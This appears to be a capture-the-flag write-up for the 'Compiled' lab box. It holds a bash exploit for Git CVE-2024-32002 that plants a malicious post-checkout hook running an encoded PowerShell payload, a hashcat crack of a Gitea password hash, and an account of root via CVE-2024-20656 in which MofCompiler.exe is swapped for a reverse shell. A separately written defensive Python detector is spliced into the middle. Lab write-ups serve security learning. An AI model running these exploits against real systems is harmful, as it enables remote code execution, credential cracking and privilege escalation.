【season-6】 box Compiled wp


USER

In the example on his Gitea instance, the Git version number is exposed.

I don't know why the temporary Python HTTP server I set up locally kept throwing errors; in the end I had no choice but to use his own Git (Gitea).

Reference:
https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese

```bash
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# optional, but I added it to avoid the warning message
git config --global init.defaultBranch main

# Define the tell-tale path
#tell_tale_path="$PWD/tell.tale"
# Because the hook is linked across, two repositories need to be prepared

git clone http://compiled.htb:3000/test/test.git
cd test
# Initialize the hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write the malicious code to a hook
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
powershell -e JABjAGwAaQBxxxx
open -a Calculator.app
EOF

# Make the hook executable: important
chmod +x y/hooks/post-checkout
echo 1111
git add y/hooks/post-checkout
git commit -m "post-checkout"
cd ..
git push

# Define the hook repository path
# The second repository, used for pulling and triggering command execution

# Initialize the captain repository
git clone http://compiled.htb:3000/test/test3.git
cd test3
git submodule add --name x/y "http://compiled.htb:3000/test/test.git" A/modules/x
git commit -m "add-submodule"

# Create a symlink
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push
cd ..

# git clone source2 -> rce
```
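As an added defensive example (not part of this writeup or the linked PoC), the following Python check inspects a repository's index, as printed by `git ls-files -s`, for the layout the script above builds: a symlink entry whose target is `.git` and a submodule (gitlink) entry whose path runs through that symlink once paths are case-folded, which is the case-insensitive file system condition the CVE relies on. The sample index lines, OIDs and blob contents are constructed.

```python
import re

LS_FILES_RE = re.compile(r"^(?P<mode>\d{6}) (?P<oid>[0-9a-f]{40}) (?P<stage>\d)\t(?P<path>.+)$")

# Constructed sample: the index the script above produces (symlink "a" -> ".git",
# submodule checked out into A/modules/x). The OIDs are made up, not real hashes.
SAMPLE_LS_FILES = [
    "100644 1111111111111111111111111111111111111111 0\tREADME.md",
    "120000 2222222222222222222222222222222222222222 0\ta",
    "160000 3333333333333333333333333333333333333333 0\tA/modules/x",
]
# Constructed blob contents keyed by OID (only symlink targets are needed).
SAMPLE_BLOBS = {"2222222222222222222222222222222222222222": ".git"}


def parse_ls_files(lines):
    """Parse `git ls-files -s` lines into (mode, oid, path) tuples."""
    entries = []
    for line in lines:
        m = LS_FILES_RE.match(line)
        if m:
            entries.append((m["mode"], m["oid"], m["path"]))
    return entries


def find_suspicious(entries, blobs, case_insensitive=True):
    """Return human-readable findings; an empty list means the pattern is absent."""
    fold = (lambda s: s.lower()) if case_insensitive else (lambda s: s)
    findings, git_links = [], set()
    for mode, oid, path in entries:
        if mode != "120000":
            continue  # only symlink entries carry a target in their blob
        target = blobs.get(oid, "")
        parts = target.replace("\\", "/").split("/")
        if any(fold(p) == ".git" for p in parts):
            findings.append(f"symlink {path!r} -> {target!r} points into a .git directory")
            git_links.add(fold(path))
    for mode, _oid, path in entries:
        if mode != "160000":
            continue  # only gitlink (submodule) entries
        parents = path.split("/")
        for i in range(1, len(parents)):
            if fold("/".join(parents[:i])) in git_links:
                findings.append(f"submodule {path!r} would be written through symlink {'/'.join(parents[:i])!r}")
                break
    return findings
```

Run it against a real repository by feeding `git ls-files -s` output to `parse_ls_files` and `git cat-file -p <oid>` results for the 120000 entries into the blobs dict; on a case-sensitive checkout only the symlink finding fires, which is why the second pass folds case.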

For Gitea, just dig the password hash out of the database; I won't go into that in detail.

```
└─$ hashcat 'sha256:50000:In2HPMqJEDzYOpdr2sUkhg:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY' -m 10900 -a 0 --show
sha256:50000:In2HPMqJEDzYOpdr2sUkhg:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY:12345678
```

ROOT

Actually I found the path right at the start, because winPEAS picked it up:

```
╔══════════╣ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\Users\All Users\Microsoft\VisualStudio\SetupWMI\MofCompiler.exe": Authenticated Users [WriteData/CreateFiles]
```

This path is really rare; I haven't seen it on other machines.

There isn't much reference material on it at the moment either; the only thing I could find is this article:

https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/

The PoC below is also based on MDSec's:

https://github.com/ruycr4ft/CVE-2024-20656

I didn't understand the first half of how it works, but I do know that the second half deletes MofCompiler.exe, and the MSI repair of Visual Studio then executes it again. What we do afterwards is replace MofCompiler.exe while the repair program is re-running it, so that in the end SYSTEM executes the replaced MofCompiler.exe.

In the GitHub PoC I changed the VSDiagnostics path to the correct location.

At first I ran it with the cmd.exe part unchanged, and I don't know why it had problems; I thought it might be a permissions issue at execution time, and it never ran through. I checked that copy permissions were fine, but it just kept going without ever reaching cb1; as far as I could see it gets to

```
ReadDirectoryChangesW(hDir, buff, 4096, TRUE, FILE_NOTIFY_CHANGE_FILE_NAME, &ret, NULL, NULL);
```

and goes no further, jumping straight to StartWMIMsi, and once execution finishes MofCompiler.exe is gone as well.

After a reset I simply swapped in a revshell.exe, and strangely enough it worked this time. I don't know why; I suspect it's a problem with the machine, though it could also be an issue with the system32 directory.
